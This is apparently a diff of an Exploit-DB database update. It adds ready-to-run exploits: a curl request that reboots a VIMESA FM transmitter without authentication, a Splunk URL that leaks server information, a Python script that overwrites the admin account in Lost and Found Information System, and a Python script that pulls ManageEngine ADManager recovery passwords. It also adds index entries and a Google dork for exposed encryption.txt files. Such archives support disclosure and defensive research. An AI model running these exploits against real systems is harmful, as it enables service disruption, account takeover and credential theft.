DB: 2024-02-14

6 changes to exploits/shellcodes/ghdb

VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) - Remote Denial Of Service

Splunk 9.0.4 - Information Disclosure

Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over

ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure

exploits/hardware/dos/51793.txt

@@ -0,0 +1,60 @@
+VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of Service
+
+
+Vendor: Video Medios, S.A. (VIMESA)
+Product web page: https://www.vimesa.es
+Affected version: img:v9.7.1 Html:v2.4 RS485:v2.5
+
+Summary: The transmitter Blue Plus is designed with all
+the latest technologies, such as high efficiency using
+the latest generation LDMOS transistor and high efficiency
+power supplies. We used a modern interface and performance
+using a color display with touch screen, with easy management
+software and easy to use. The transmitter is equipped with
+all audio input including Audio IP for a complete audio
+interface. The VHF/FM transmitter 30-1000 is intended
+for the transmission of frequency modulated broadcasts
+in mono or stereo. It work with broadband characteristics
+in the VHF frequency range from 87.5-108 MHz and can be
+operated with any frequency in this range withoug alignment.
+The transmitter output power is variable between 10 and 110%
+of the nominal Power. It is available with different remote
+control ports. It can store up to six broadcast programs
+including program specific parameters such as frequency,
+RF output power, modulation type, RDS, AF level and deviation
+limiting. The transmitter is equipped with a LAN interface
+that permits the complete remote control of the transmitter
+operation via SNMP or Web Server.
+
+Desc: The device is suffering from a Denial of Service (DoS)
+vulnerability. An unauthenticated attacker can issue an
+unauthorized HTTP GET request to the unprotected endpoint
+'doreboot' and restart the transmitter operations.
+
+Tested on: lighttpd/1.4.32
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5798
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php
+
+
+22.07.2023
+
+--
+
+
+$ curl -v "http://192.168.3.11:5007/doreboot"
+*   Trying 192.168.3.11:5007...
+* Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0)
+> GET /doreboot HTTP/1.1
+> Host: 192.168.3.11:5007
+> User-Agent: curl/8.0.1
+> Accept: */*
+>
+* Recv failure: Connection was reset
+* Closing connection 0
+curl: (56) Recv failure: Connection was reset

exploits/multiple/webapps/51792.txt

@@ -0,0 +1,14 @@
+# Exploit Title: Splunk 9.0.4 - Information Disclosure
+# Date: 2023-09-18
+# Exploit Author: Parsa rezaie khiabanloo
+# Vendor Homepage: https://www.splunk.com/
+# Version: 9.0.4
+# Tested on: Windows OS
+
+# Splunk through 9.0.4  allows information disclosure by appending
+# /__raw/services/server/info/server-info?output_mode=json to a query,
+# as demonstrated by discovering a license key and other information.
+
+# PoC :
+
+https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json

exploits/php/webapps/51795.py

@@ -0,0 +1,37 @@
+# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
+# Date: 2023-12-03
+# Exploit Author: OR4NG.M4N
+# Category : webapps
+# CVE : CVE-2023-38965
+
+Python p0c :
+
+import argparse
+import requests
+import time
+parser = argparse.ArgumentParser(description='Send a POST request to the target server')
+parser.add_argument('-url', help='URL of the target', required=True)
+parser.add_argument('-user', help='Username', required=True)
+parser.add_argument('-password', help='Password', required=True)
+args = parser.parse_args()
+
+
+url = args.url + '/classes/Users.php?f=save'
+
+
+data = {
+    'id': '1',
+    'firstname': 'or4ng',
+    'middlename': '',
+    'lastname': 'Admin',
+    'username': args.user,
+    'password': args.password
+}
+
+response = requests.post(url, data)
+if b"1" in response.content:
+    print("Exploit ..")
+    time.sleep(1)
+    print("User :" + args.user + "\nPassword :" + args.password)
+else:
+    print("Exploit Failed..")

exploits/windows/webapps/51794.py

@@ -0,0 +1,81 @@
+# Exploit Title: ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/products/ad-manager/
+# Details: https://docs.unsafe-inline.com/0day/manageengine-admanager-plus-build-less-than-7183-recovery-password-disclosure-cve-2023-31492
+# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md
+# Version: ADManager Plus Build < 7183
+# Tested against: Build 7180
+# CVE: CVE-2023-31492
+
+import argparse
+import requests
+import urllib3
+import sys
+
+"""
+The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover.
+When deleted user accounts are restored, defined password is set to the user accounts.
+Helpdesk technician that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment.
+"""
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def getPass(target, auth, user, password):
+    with requests.Session() as s:
+        if auth.lower() == 'admanager':
+            auth = 'ADManager Plus Authentication'
+        data = {
+            "is_admp_pass_encrypted": "false",
+            "j_username": user,
+            "j_password": password,
+            "domainName": auth,
+            "AUTHRULE_NAME": "ADAuthenticator"
+        }
+        # Login
+        url = target + 'j_security_check?LogoutFromSSO=true'
+        headers = {
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
+            "Content-Type": "application/x-www-form-urlencoded"
+        }
+        req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)
+        if 'Cookie' in req.request.headers:
+            print('[+] Authentication successful!')
+        elif req.status_code == 200:
+            print('[-] Invalid login name/password!')
+            sys.exit(0)
+        else:
+            print('[-] Something went wrong!')
+            sys.exit(1)
+
+        # Fetching recovery password
+        for i in range(1, 6):
+            print('[*] Trying to fetch recovery password for domainId: %s !' % i)
+            passUrl = target + 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' + str(i) + '%22%7D'
+            passReq = s.get(passUrl, headers=headers, allow_redirects=False, verify=False)
+            if passReq.content:
+                print(passReq.content)
+
+
+def main():
+    arg = get_args()
+    target = arg.target
+    auth = arg.auth
+    user = arg.user
+    password = arg.password
+    getPass(target, auth, user, password)
+
+
+def get_args():
+    parser = argparse.ArgumentParser(
+        epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1")
+    parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
+    parser.add_argument('-a', '--auth', required=True, action='store',
+                        help='If you have credentials of the application user, type admanager. If you have credentials of the domain user, type domain DNS name of the target domain.')
+    parser.add_argument('-u', '--user', required=True, action='store')
+    parser.add_argument('-p', '--password', required=True, action='store')
+    args = parser.parse_args()
+    return args
+
+
+main()

files_exploits.csv

@@ -3227,6 +3227,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 26138,exploits/hardware/dos/26138.txt,"Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow (PoC)",2013-06-12,"Core Security",dos,hardware,554,2013-06-12,2013-06-12,1,CVE-2013-1606;OSVDB-94211,,,,,http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service
 22596,exploits/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli & Fabio Annunziato",dos,hardware,,2003-05-08,2012-11-12,1,,,,,,https://www.securityfocus.com/bid/7575/info
 28271,exploits/hardware/dos/28271.py,"Vestel TV 42pf9322 - Denial of Service",2013-09-13,HackerSofi,dos,hardware,111,2013-09-13,2013-09-13,0,OSVDB-97456,,,,,
+51793,exploits/hardware/dos/51793.txt,"VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) - Remote Denial Of Service",2024-02-13,LiquidWorm,dos,hardware,,2024-02-13,2024-02-13,0,,,,,,
 45776,exploits/hardware/dos/45776.py,"Virgin Media Hub 3.0 Router - Denial of Service (PoC)",2018-11-05,"Ross Inman",dos,hardware,,2018-11-05,2018-11-05,0,,"Denial of Service (DoS)",,,,
 24143,exploits/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,dos,hardware,,2004-05-24,2013-01-15,1,CVE-2004-2344;OSVDB-6413,,,,,https://www.securityfocus.com/bid/10411/info
 43164,exploits/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,dos,hardware,,2017-11-21,2017-11-22,0,CVE-2017-16902,,,,,
@@ -12193,6 +12194,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31990,exploits/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",webapps,multiple,,2014-02-28,2014-02-28,0,CVE-2013-6231;OSVDB-103890,,,,,
 48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple,,2020-09-18,2020-09-18,0,CVE-2020-11804;CVE-2020-11803;CVE-2020-11700;CVE-2020-11699,,,,,
 21053,exploits/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",webapps,multiple,,2012-09-04,2012-09-04,0,OSVDB-85824,,,,,
+51792,exploits/multiple/webapps/51792.txt,"Splunk 9.0.4 - Information Disclosure",2024-02-13,"Parsa Rezaie Khiabanloo",webapps,multiple,,2024-02-13,2024-02-13,0,,,,,,
 51747,exploits/multiple/webapps/51747.py,"Splunk 9.0.5 - admin account take over",2023-10-09,"Redway Security",webapps,multiple,,2023-10-09,2023-10-09,0,CVE-2023-32707,,,,,
 41779,exploits/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,webapps,multiple,,2017-03-31,2017-03-31,1,CVE-2017-5607,,,,,
 40895,exploits/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,webapps,multiple,,2016-12-09,2016-12-09,1,,,,,,
@@ -22681,6 +22683,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5121,exploits/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Local/Remote File Inclusion",2008-02-14,MhZ91,webapps,php,,2008-02-13,2016-11-14,1,OSVDB-41835;CVE-2008-0803;OSVDB-41834;OSVDB-41833;OSVDB-41832;OSVDB-41831;OSVDB-41830;OSVDB-41829;OSVDB-41828;OSVDB-41827;OSVDB-41826;OSVDB-41825;OSVDB-41824;OSVDB-41823;OSVDB-41822;OSVDB-41821;OSVDB-41820;OSVDB-41819;OSVDB-41818;OSVDB-41817;OSVDB-41816;OSVDB-41815;OSVDB-41814;OSVDB-41813;OSVDB-41812;OSVDB-41811;OSVDB-41810;OSVDB-41809;OSVDB-41808,,,,http://www.exploit-db.comlookstrike-v0.9.zip,
 26688,exploits/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,webapps,php,,2005-12-01,2013-07-08,1,CVE-2005-3988;OSVDB-21328,,,,,https://www.securityfocus.com/bid/15665/info
 7896,exploits/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,webapps,php,,2009-01-27,,1,,,,,,
+51795,exploits/php/webapps/51795.py,"Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over",2024-02-13,Or4nG.M4N,webapps,php,,2024-02-13,2024-02-13,0,,,,,,
 51570,exploits/php/webapps/51570.py,"Lost and Found Information System v1.0 - SQL Injection",2023-07-06,"Amirhossein Bahramizadeh",webapps,php,,2023-07-06,2023-07-06,0,CVE-2023-33592,,,,,
 48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-11-05,1,,,,,,
 48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
@@ -45718,6 +45721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 20353,exploits/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2586;OSVDB-84590,,,http://www.exploit-db.com/screenshots/idlt20500/mailtraq-payload-55.png,,
 36960,exploits/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",webapps,windows,8080,2015-05-08,2015-05-08,0,OSVDB-121830,,,,,
 45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,,2018-08-25,2018-08-25,0,CVE-2018-15608,,,,,
+51794,exploits/windows/webapps/51794.py,"ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure",2024-02-13,"Metin Yunus Kandemir",webapps,windows,,2024-02-13,2024-02-13,0,,,,,,
 43129,exploits/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",webapps,windows,9090,2017-11-07,2017-11-07,0,CVE-2017-16543;CVE-2017-16542,"SQL Injection (SQLi)",,,,
 37395,exploits/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting",2015-06-26,"Suraj Krishnaswami",webapps,windows,,2015-06-26,2015-06-26,0,CVE-2015-2169;OSVDB-123630,,,,,
 37059,exploits/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 - Cross-Site Request Forgery",2015-05-18,"Akash S. Chavan",webapps,windows,,2015-05-18,2016-10-10,1,OSVDB-122270,,,,,

ghdb.xml

@@ -52321,6 +52321,18 @@ attachments</textualDescription>
   <date>2020-01-21</date>
   <author>Marcelo Ruz S.</author>
  </entry>
+ <entry>
+  <id>8414</id>
+  <link>https://www.exploit-db.com/ghdb/8414</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:* &quot;encryption.txt&quot;</shortDescription>
+  <textualDescription>Google dork: inurl:* &quot;encryption.txt&quot;</textualDescription>
+  <query>inurl:* &quot;encryption.txt&quot;</query>
+  <querystring>https://www.google.com/search?q=inurl:* &quot;encryption.txt&quot;</querystring>
+  <edb></edb>
+  <date>2024-02-13</date>
+  <author>Naved Ansari</author>
+ </entry>
  <entry>
   <id>8145</id>
   <link>https://www.exploit-db.com/ghdb/8145</link>